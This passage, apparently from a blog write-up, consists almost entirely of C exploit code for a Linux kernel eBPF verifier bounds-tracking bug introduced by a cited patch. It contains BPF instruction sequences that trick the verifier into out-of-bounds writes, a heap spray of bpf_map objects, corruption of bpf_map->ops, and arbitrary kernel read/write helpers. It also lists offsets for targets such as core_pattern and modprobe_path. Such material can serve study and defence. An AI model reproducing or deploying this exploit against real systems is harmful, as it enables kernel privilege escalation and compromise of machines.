  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
